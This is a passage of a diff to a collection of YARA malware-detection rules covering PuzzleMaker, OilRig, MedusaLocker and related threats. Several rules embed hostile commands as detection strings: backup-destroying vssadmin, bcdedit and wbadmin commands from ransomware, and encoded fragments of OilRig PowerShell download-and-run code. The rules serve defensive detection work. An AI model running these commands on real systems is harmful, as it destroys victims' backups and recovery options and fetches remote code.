-		$s6 = ";\";0;d;" fullword ascii
-		$s7 = "T0p0v0|0" fullword ascii
+		$s1 = { 4c 8d 4c 24 5c 49 8b ce 48 8d 95 c0 00 00 00 ff 15 21 01 04 00 85 c0 74 28 4c 8d 4c 24 58 4c 89 64 24 20 41 b8 00 04 00 00 48 8d 95 c0 04 00 00 49 8b cf ff 15 b5 fe 03 00 85 c0 0f 85 25 ff ff ff ff 15 77 fe 03 00 8b }
+		$s2 = { 40 55 53 56 41 55 41 57 48 8d ac 24 a0 fe ff ff 48 81 ec 60 02 00 00 48 8b 05 5a 1c 03 00 48 33 c4 48 89 85 30 01 00 00 48 8b 85 b0 01 00 00 4c 8b f9 48 8b b1 b8 00 00 00 4c 8b ad c8 01 00 00 48 83 c6 07 48 89 44 24 60 48 8b 85 d0 01 00 00 48 89 45 98 8b 85 c0 01 00 00 83 c0 fd 48 c1 ee 03 4c 89 4d 80 4c 89 45 88 48 89 55 90 83 f8 06 0f 87 84 03 00 00 48 8d 15 f3 6b fd ff 48 98 8b 8c 82 b0 97 02 00 48 }
+		$s3 = { 48 8d 1d 98 3d 02 00 0f 57 c0 48 89 bc 24 58 02 00 00 33 c0 c7 44 24 68 01 00 00 00 0f 11 85 80 00 00 00 4c 8b c6 c7 85 8c 00 00 00 10 27 00 00 48 8d 95 a0 00 00 00 48 89 44 24 70 49 8b c9 48 89 44 24 78 0f 11 45 20 0f 11 45 30 0f 11 45 40 0f 11 45 50 0f 11 45 60 0f 11 45 70 0f 11 85 90 00 00 00 e8 57 58 fe ff 8b f8 85 c0 0f 85 62 02 00 00 49 8b 87 b8 00 00 00 48 8d 4c 24 68 48 8b 54 24 60 48 83 c0 07 48 c1 e8 03 4c 89 a4 24 50 02 00 00 4c 8b a5 b8 01 00 00 4c 3b e0 4c 89 b4 24 48 02 00 00 4d 8b f4 4c 0f 47 f0 4d 8b c6 e8 1b 57 fe ff 8b f8 85 c0 75 54 49 8b 87 b8 00 00 00 4a 8d 14 f5 00 00 00 00 48 }
+		$s4 = { 85 ff 0f 85 cd 01 00 00 48 8b 4d 90 48 8d 45 a0 48 89 44 24 50 45 33 c9 48 8d 45 d0 4d 8b c7 48 89 44 24 48 33 d2 4c 89 64 24 40 4c 89 64 24 38 c7 44 24 30 00 00 00 08 c7 44 24 28 01 00 00 00 4c 89 64 24 20 ff 15 62 1c 04 00 85 c0 75 3a ff 15 38 1d 04 00 44 8b c3 48 8b ce 8b d0 8b f8 e8 d1 09 00 00 48 8b 4d 80 ff 15 07 1d 04 00 48 8b 4d 88 ff 15 fd 1c 04 00 48 8b 4d 90 ff 15 f3 1c 04 00 }
+		$s5 = { 40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 ec 28 02 00 00 48 8b 05 5d 0a 04 00 48 33 c4 48 89 84 24 10 02 00 00 48 8b ac 24 90 02 00 00 0f 57 c0 4c 8b ac 24 98 02 00 00 33 db 45 32 e4 4c 89 4c 24 58 4c 89 44 24 70 49 8b f9 48 89 6c 24 68 4d 8b c8 4c 89 6c 24 60 4c 8b fa 48 8b f1 44 8b f3 0f 11 84 24 e0 00 00 00 c7 84 24 ec 00 00 00 10 27 00 00 0f 11 84 24 80 00 00 00 0f 11 84 24 90 00 00 00 0f 11 84 24 a0 00 00 00 0f 11 84 24 b0 00 00 00 0f 11 84 24 c0 00 00 00 0f 11 84 24 d0 00 00 00 0f 11 84 24 f0 00 00 00 48 85 ed 75 47 4c 8b 81 b8 00 00 00 48 8d 05 a1 c2 ff ff 48 89 44 24 68 48 8d 8c 24 80 00 00 00 49 83 c0 07 48 8d 84 24 80 00 00 00 49 c1 e8 03 49 8b d1 48 89 44 24 60 e8 87 c2 ff ff 8b f8 85 c0 0f 85 ee 01 00 00 48 8b 7c 24 58 48 8d 56 68 48 8d 4f 18 e8 7b 4a ff ff 85 c0 75 15 48 8d 56 50 48 8b cf e8 6b 4a ff ff 85 c0 75 05 40 b5 }
+		$s6 = { 41 b9 01 00 00 00 c7 44 24 20 00 00 00 f0 45 33 c0 48 8d 4c 24 60 33 d2 ff 15 11 06 04 00 85 c0 74 28 48 8b 4c 24 60 4c 8d 85 b0 00 00 00 ba 20 00 00 00 ff 15 ee 05 04 00 48 8b 4c 24 60 33 d2 85 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( pe.imphash ( ) == "ff6dd5f31dd7c538ebc02542f09f4280" and pe.exports ( "setColor" ) or all of them )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_TA505_Maldoc_21Nov_1 : FILE
+rule ARKBIRD_SOLG_APT_Puzzlemaker_Launcher_Jun_2021_1 : FILE
 {
 	meta:
-		description = "invitation.doc"
+		description = "Detect the launcher of the PuzzleMaker group"
 		author = "Arkbird_SOLG"
-		id = "10562979-0b90-5752-89b8-f0d35121df41"
-		date = "2019-11-21"
-		modified = "2019-11-21"
-		reference = "https://twitter.com/58_158_177_102/status/1197432303057637377"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L52-L83"
+		id = "ae31d9de-8e6c-5c1b-bc45-bc4e50cea00f"
+		date = "2021-06-10"
+		modified = "2021-11-01"
+		reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Launcher_Jun_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "7d2cbc0a505c245aa3e9e8a76cebc7ea7dbd4bd3be26a858f731b96791293ba5"
+		logic_hash = "5c717ca5c57a86e1b5db45b3d581a45be248d45820c00c40c57a001ac07ce1b2"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "a197c6de8734044c441438508dd3ce091252de4f98df2016b006a1c963c02505"
+		hash1 = "982f7c4700c75b81833d5d59ad29147c392b20c760fe36b200b541a0f841c8a9"
+		tlp = "White"
+		adversary = "PuzzleMaker"
 
 	strings:
-		$x1 = "C:\\Users\\J\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\basecamp" fullword wide
-		$x2 = "*\\G{42DC991A-7E1B-4254-B210-CDD3DDCFD365}#2.0#0#C:\\Users\\1\\AppData\\Local\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object" wide
-		$x3 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide
-		$x4 = "C:\\Users\\J\\AppData\\Local\\Temp\\basecamp" fullword wide
-		$s5 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
-		$s6 = "*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual" wide
-		$s7 = "glColor.dll" fullword ascii
-		$s8 = "magne.dll" fullword ascii
-		$s9 = "InitScope.dll" fullword wide
-		$s10 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" fullword wide
-		$s11 = "CopyFiles=@EP0NGJ8D.GPD,@EP0NGN8D.GPD,@EP0NGX8D.GPD,@EP0NCJ8D.CMB,@EP0NOJ8D.DXT,@EP0NOE10.DLL,@EP0NM4RC.DLL,@EP0NRE8D.DLL" fullword wide
-		$s12 = "CopyFiles=@EP0NGJ8C.GPD,@EP0NGN8C.GPD,@EP0NGX8C.GPD,@EP0NCJ8C.CMB,@EP0NOJ8C.DXT,@EP0NOE09.DLL,@EP0NM4RB.DLL,@EP0NRE8C.DLL" fullword wide
-		$s13 = "vspub2.dll-" fullword ascii
-		$s14 = "pictarget" fullword ascii
-		$s15 = "Public Declare Function ZooDcom Lib        \"vspub1.dll\" Alias \"IKAJSL\" () As Integer" fullword ascii
-		$s16 = "\"Epson\"=\"http://go.microsoft.com/fwlink/?LinkID=36&prd=10798&sbp=Printers\"" fullword wide
-		$s17 = "EP0NM4RC.DLL = 1" fullword wide
-		$s18 = "EP0NOE10.DLL = 1" fullword wide
-		$s19 = "EP0NRE8C.DLL = 1" fullword wide
-		$s20 = "EP0NM4RB.DLL = 1" fullword wide
+		$s1 = { 4c 89 6d bf 48 8d 45 bf 48 89 44 24 20 4c 8d 0d f9 45 01 00 33 d2 44 8d 42 01 48 8d 0d dc 45 01 00 ff 15 56 44 01 00 8b d8 85 c0 78 c6 4c 89 6d c7 48 8b 45 bf 48 8b 08 4c 8b 79 18 b9 18 00 00 00 e8 9b 04 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 32 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8d 0d 15 fb 01 00 ff 15 cf 43 01 00 48 89 03 48 85 }
+		$s2 = { 44 89 6c 24 38 4c 89 6c 24 30 c7 44 24 28 03 00 00 00 c7 44 24 20 03 00 00 00 45 33 c9 45 33 c0 41 8d 51 0a 48 8b 4d c7 ff 15 f6 42 01 00 85 c0 0f 88 bb 01 00 00 48 8d 0d 1d fa 01 00 ff 15 c1 42 01 00 4c 8b f8 48 8d 0d 1b fa 01 00 ff 15 b1 42 01 00 4c 8b e0 4c 89 6d df 48 8b 4d c7 48 8b 11 4c 8b 52 30 4c 89 6c 24 28 48 8d 45 df 48 89 44 24 20 45 33 c9 45 33 c0 49 8b d4 41 ff d2 4c 89 6d e7 48 8b 4d df 48 8b 01 4c 89 6c 24 20 4c 8d 4d e7 45 33 c0 49 8b d7 ff 90 98 00 00 00 4c 89 6d cf 48 8b 4d e7 48 8b 01 4c 8d 45 cf 33 d2 ff 50 78 b8 08 00 00 00 66 89 45 ef 8d 48 10 e8 dc 02 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 33 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8b ce ff 15 14 42 01 00 48 89 03 48 85 c0 75 0e 48 85 }
+		$s3 = { 4c 8d 05 75 0e 02 00 0f 1f 40 00 66 0f 1f 84 00 00 00 00 00 0f b6 d0 42 0f b6 0c 12 66 41 31 08 74 12 ff c0 49 83 c0 02 83 f8 20 72 e7 0f 1f 80 00 00 00 00 0f b7 05 49 09 02 00 48 8d 0d 76 09 02 00 66 d1 e8 66 83 e0 7f 66 0f 6f 15 f3 d4 01 00 66 89 05 2c 09 02 00 0f b7 05 27 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 19 09 02 00 0f b7 05 14 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 06 09 02 00 0f b7 05 01 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 f3 08 02 00 0f b7 05 ee 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e0 08 02 00 0f b7 05 db 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 cd 08 02 00 0f b7 05 c8 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 ba 08 02 00 0f b7 05 b5 08 02 00 66 d1 e8 66 83 e0 7f f3 0f 6f 05 bc 08 02 00 66 89 05 9f 08 02 00 0f b7 05 9a 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 8c 08 02 00 0f b7 05 87 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 79 08 02 00 0f b7 05 74 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 66 08 02 00 0f b7 05 61 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 53 08 02 00 0f b7 05 4e 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 40 08 02 00 0f b7 05 3b 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 2d 08 02 00 0f b7 05 28 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 1a 08 02 00 0f b7 05 15 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 07 08 02 00 0f b7 05 02 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 f4 07 02 00 0f b7 05 ef 07 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e1 07 02 00 b8 01 00 00 00 66 0f 6e c8 8d 50 05 66 0f d1 c1 66 0f db c2 f3 0f 7f 05 c7 07 02 00 0f }
+		$s4 = { 48 89 9c 24 60 06 00 00 48 89 b4 24 68 06 00 00 48 89 bc 24 70 06 00 00 4c 89 b4 24 30 06 00 00 c7 05 2e 1a 02 00 04 00 00 00 48 c7 05 27 1a 02 00 01 00 00 00 4c 89 2d 2c 1a 02 00 ff 15 22 48 01 00 48 8d 35 8b 04 02 00 66 66 66 0f 1f 84 00 00 00 00 00 33 d2 44 89 6c 24 70 41 b8 08 03 00 00 48 8d 8d 10 02 00 00 45 8b f5 e8 e4 28 00 00 4c 8d 0d 5d 03 02 00 48 89 74 24 20 ba 84 01 00 00 48 8d 8d 10 02 00 00 49 c7 c0 ff ff ff ff e8 a0 fb ff ff 48 8d 54 24 70 48 8d 8d 10 02 00 00 e8 9f 05 00 00 8b d0 85 }
+		$s5 = { 4c 89 6c 24 60 4c 8d 05 25 cc 01 00 4c 89 6c 24 58 48 8d 15 e1 04 02 00 4c 89 6c 24 50 41 b9 ff 01 0f 00 4c 89 6c 24 48 48 8b cf 4c 89 6c 24 40 48 89 74 24 38 44 89 6c 24 30 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 ff 15 19 46 01 00 48 8b d8 ff 15 a8 46 01 00 8b f0 48 85 db 74 22 48 8b cb ff 15 20 46 01 00 48 8b cb ff 15 ff 45 01 00 48 8b cf ff 15 f6 45 01 00 bf 01 00 00 }
+		$s6 = { 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 f4 46 01 00 48 8b f8 48 85 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
+}
+rule ARKBIRD_SOLG_APT_Oilrig_VBS_2016_1 : FILE
+{
+	meta:
+		description = "Detect VBS script in base 64 used by OilRig (2016)"
+		author = "Arkbird_SOLG"
+		id = "5cc3a3f1-4f2f-56c4-af69-8652d22b6730"
+		date = "2020-08-26"
+		modified = "2021-07-13"
+		reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L4-L23"
+		license_url = "N/A"
+		logic_hash = "a6c42c46c80ca79b01aa0475c823aeccef416a0f8c2f58db95392cbe125b2fad"
+		score = 75
+		quality = 63
+		tags = "FILE"
+		hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c"
+		hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5"
+
+	strings:
+		$block1 = { 53 45 39 4e 52 54 30 69 4a 58 42 31 59 6d 78 70 59 79 56 63 54 47 6c 69 63 6d 46 79 61 57 56 7a 58 43 49 }
+		$block2 = { 43 6c 4e 46 55 6c 5a 46 55 6a 30 69 61 48 52 30 }
+		$block3 = { 56 34 4c 6d 46 7a 63 48 67 2f 63 6d 56 78 }
+		$block4 = { 6a 30 69 63 47 39 33 5a 58 4a 7a 61 47 56 73 62 43 41 69 49 69 5a 37 4a 48 64 6a 50 53 68 75 5a 58 63 74 62 32 4a 71 5a 57 4e 30 49 46 4e 35 63 33 52 6c 62 53 35 4f 5a 58 51 75 56 32 56 69 51 32 78 70 5a 57 35 30 4b 54 73 6b 64 32 4d 75 56 58 4e 6c 52 47 56 6d 59 58 56 73 64 45 4e 79 5a 57 52 6c 62 6e 52 70 59 57 78 7a 50 53 52 30 63 6e 56 6c 4f 79 52 33 59 79 35 49 5a 57 46 6b 5a 58 4a 7a 4c 6d 46 6b 5a 43 67 6e 51 57 4e 6a 5a 58 42 30 4a 79 77 6e 4b 69 38 71 4a 79 6b 37 4a 48 64 6a 4c 6b 68 6c 59 57 52 6c 63 6e 4d 75 59 57 52 6b 4b 43 64 56 63 32 56 79 4c 55 46 6e 5a 57 35 30 4a 79 77 6e 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 45 4a 4a 56 46 4d 76 4e 79 34 33 4a 79 6b 37 64 32 68 70 62 47 55 6f 4d 53 6c 37 64 48 4a 35 65 79 52 79 50 55 64 6c 64 43 31 53 59 57 35 6b 62 32 30 37 4a 48 64 6a 4c 6b 52 76 64 32 35 73 62 32 46 6b 52 6d 6c 73 }
+		$block5 = { 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 [1-4] 45 52 33 62 69 77 69 4c 56 38 [1-4] 4a 6b 64 32 34 69 4b 53}
+		$block6 = { 30 69 49 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 4e 6c 4b 45 52 76 64 32 35 73 62 32 46 6b 52 58 68 6c 59 33 56 30 5a 53 77 69 4c 56 38 69 4c 43 4a 69 59 58 51 }
+		$block7 = { 51 70 72 62 32 31 6a 50 53 4a 77 62 33 64 6c 63 6e 4e 6f 5a 57 78 73 49 43 31 6c 65 47 56 6a 49 45 4a 35 63 47 46 7a 63 79 41 74 52 6d 6c 73 5a 53 41 69 4a 6b }
+		$block8 = { 0a b7 9a b5 e3 9b 8d e7 2d 59 27 2b 8a 9b 52 85 e9 65 46 e9 [1-4] d4 }
+
+	condition:
+		filesize < 2KB and 6 of them
+}
+rule ARKBIRD_SOLG_APT_Oilrig_PSH_Helminth_2016_1 : FILE
+{
+	meta:
+		description = "Detect Powershell script Helminth in base 64 used by OilRig (2016)"
+		author = "Arkbird_SOLG"
+		id = "782503c2-a292-505c-b513-79cbbd381124"
+		date = "2020-08-26"
+		modified = "2021-07-13"
+		reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L25-L45"
+		license_url = "N/A"
+		logic_hash = "0216015765f5abdb6ccf7643344aead51e4eebb19fd947f9484ce5dc6696d4d5"
+		score = 75
+		quality = 61
+		tags = "FILE"
+		hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c"
+		hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5"
+
+	strings:
+		$block1 = { 70 74 65 57 6c 6b 49 44 30 67 4a 79 4d 6a 49 79 63 67 44 51 6f 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 67 50 53 41 69 4a 47 56 75 64 6a 70 51 64 }
+		$block2 = { 41 67 ?? ?? 42 6c 62 48 4e 6c 61 57 59 6f 4a 47 31 35 5a 6d 78 68 5a 7a 4d 67 4c 57 56 78 49 44 49 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 67 6e 64 33 63 6e 4b 79 52 6e 62 47 39 69 59 57 77 36 62 58 6c 70 5a 43 73 6b 59 32 31 6b 61 57 51 72 4a 48 42 68 63 6e 52 70 5a 43 73 6f }
+		$block3 = { 6a 61 47 46 79 58 53 42 62 61 57 35 30 58 53 41 6b 64 47 31 77 57 7a 42 64 4b 53 41 72 49 43 }
+		$block4 = { 43 52 6a 62 6e 51 67 4c 57 56 78 49 44 49 31 4b 53 6b 67 44 51 6f 67 49 43 41 67 65 79 41 }
+		$block5 = { 5a 6c 52 45 35 54 49 43 67 6b 5a 43 6b 67 44 51 70 37 49 41 30 4b 43 53 52 6a 62 6e 51 67 50 53 41 77 49 41 30 4b 43 58 64 6f 61 57 78 6c 49 43 67 6b 59 32 35 30 49 43 31 73 64 43 41 79 4d 43 6b 67 44 51 6f 4a 65 79 41 4e 43 67 6b 4a 64 48 4a 35 49 41 30 4b 43 51 6c 37 }
+		$block6 = { 4b 49 43 41 67 49 43 41 67 49 43 41 6b 61 53 73 72 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 49 43 41 67 61 57 59 6f 4a 48 4a 6c 64 43 41 74 5a 58 45 67 4d 53 6b 67 44 51 6f 67 49 43 41 }
+		$block7 = { 77 36 62 58 6c 6d 62 47 46 6e 49 44 30 67 4d 43 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 43 41 67 49 47 56 73 63 32 56 70 5a 69 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 5a 73 59 57 63 67 4c 57 56 78 49 44 45 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 52 30 62 58 41 67 50 53 41 6b 62 58 6c 6b 59 58 52 68 4c 6c 4e 77 62 47 6c 30 4b 43 63 75 4a 79 6b 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 46 74 54 65 58 4e 30 5a 57 30 75 53 55 38 75 52 6d 6c 73 5a 56 30 36 4f 6b 46 77 63 47 56 75 5a 45 46 73 62 46 52 6c 65 48 51 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 72 4a 47 64 73 62 32 4a 68 62 44 70 6d 61 57 78 6c 62 6d 46 74 }
+		$block8 = { 4a 47 6b 72 4b 79 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 48 30 67 44 51 6f 67 44 51 6f 67 5a 6e 56 75 59 33 52 70 62 32 34 67 52 32 56 30 53 55 [1-10] 4e 43 69 41 67 49 43 41 6b 5a 32 78 76 59 6d 46 73 4f 6d 31 35 61 57 51 67 50 53 42 54 5a 57 35 6b 55 6d 56 6a 5a 57 6c 32 5a 55 52 4f 55 79 41 6f 4b 45 64 6c 64 46 4e 31 59 69 41 77 4b 53 73 6e 4d 7a 41 6e 4b 53 41 4e 43 69 42 39 49 41 30 4b 49 41 30 4b 49 47 5a 31 62 6d 4e 30 61 57 39 [1-10] 56 52 6f 61 58 4e 47}
+		$block9 = { 73 67 44 51 6f 4a 43 57 31 6b 49 43 31 47 62 33 4a 6a 5a 53 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 70 49 41 30 4b 43 51 6c 48 5a 58 52 4a 52 43 41 4e 43 67 6b 4a 51 32 68 68 62 6d 64 6c 56 47 68 70 63 30 5a 70 62 47 55 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 6c 6b 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 66 53 41 4e 43 69 42 6d 64 57 35 6a 64 47 6c 76 62 69 42 74 59 57 6c 75 49 41 30 4b }
+
+	condition:
+		filesize < 3KB and 7 of them
+}
+rule ARKBIRD_SOLG_RAN_Medusalocker_July_2021_1 : FILE
+{
+	meta:
+		description = "Detect MedusaLocker ransomware"
+		author = "Arkbird_SOLG"
+		id = "7eec35ac-f1ec-596b-8224-ef27e31e841c"
+		date = "2021-07-25"
+		modified = "2021-08-08"
+		reference = "https://twitter.com/r3dbU7z/status/1418433910057353217"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-25/MedusaLocker/RAN_MedusaLocker_July_2021_1.yara#L1-L28"
+		license_url = "N/A"
+		logic_hash = "541665541c07b585a7dfa024f85516b7be94d7d8d76a85e58c8c3b71fd0550ff"
+		score = 75
+		quality = 73
+		tags = "FILE"
+		hash1 = "033b4950a8f249b20eb86ec6f8f2ea0a1567bb164289d1aa7fb0ba51f9bbe46c"
+		hash2 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad"
+		hash3 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc"
+		hash4 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31"
+		tlp = "white"
+		adversary = "RaaS"
+
+	strings:
+		$s1 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 52 00 65 00 73 00 69 00 7a 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 53 00 74 00 6f 00 72 00 61 00 67 00 65 00 20 00 2f 00 66 00 6f 00 72 00 3d 00 ?? 00 3a 00 20 00 2f 00 6f 00 6e 00 3d 00 ?? 00 3a 00 20 00 2f 00 6d 00 61 00 78 00 73 00 69 00 7a 00 65 00 3d }
+		$s2 = { 64 00 65 00 6c 00 20 00 2f 00 73 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 56 00 48 00 44 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 63 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 6b 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 62 00 63 00 61 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 6b 00 66 00 20 00 ?? 00 3a 00 5c 00 42 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 62 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 73 00 65 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 69 00 6e 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 64 00 73 00 6b }
+		$s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 }
+		$s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 }
+		$s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide
+		$s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f }
+		$s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 }
+		$s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 }
+		$s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 }
+		$s10 = { 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 20 4c 49 53 54 20 4f 46 20 45 4e 43 52 59 50 54 45 44 20 46 49 4c 45 53 20 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 0d 0a }
+		$x1 = { 48 89 5c 24 08 57 48 83 ec 30 48 8b da 48 8b f9 e8 0b fe ff ff 44 8b 43 08 48 8d 47 28 44 2b 03 45 33 c9 48 8b 13 48 8b 4f 20 48 89 44 24 28 c7 44 24 20 00 00 00 00 ff 15 [2] 07 00 85 c0 74 12 c6 47 08 01 48 8b c7 48 8b 5c 24 40 48 83 c4 30 5f c3 ff 15 [2] 07 00 48 8b 5c 24 40 89 47 34 48 8b c7 }
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 3000KB and 1 of ( $x* ) and 4 of them
+		uint16( 0 ) == 0x5A4D and filesize > 150KB and 9 of ( $s* ) and $x1
 }
-rule ARKBIRD_SOLG_TA505_Maldoc_21Nov_2 : FILE
+rule ARKBIRD_SOLG_RAN_Biglock_Jun_2021_1 : FILE
 {
 	meta:
-		description = "invitation (1).xls"
+		description = "Detect BigLock ransomware"
 		author = "Arkbird_SOLG"
-		id = "e6328342-0d08-58a3-befe-15de41649763"
-		date = "2019-11-21"
-		modified = "2019-11-21"
-		reference = "https://twitter.com/58_158_177_102/status/1197432303057637377"
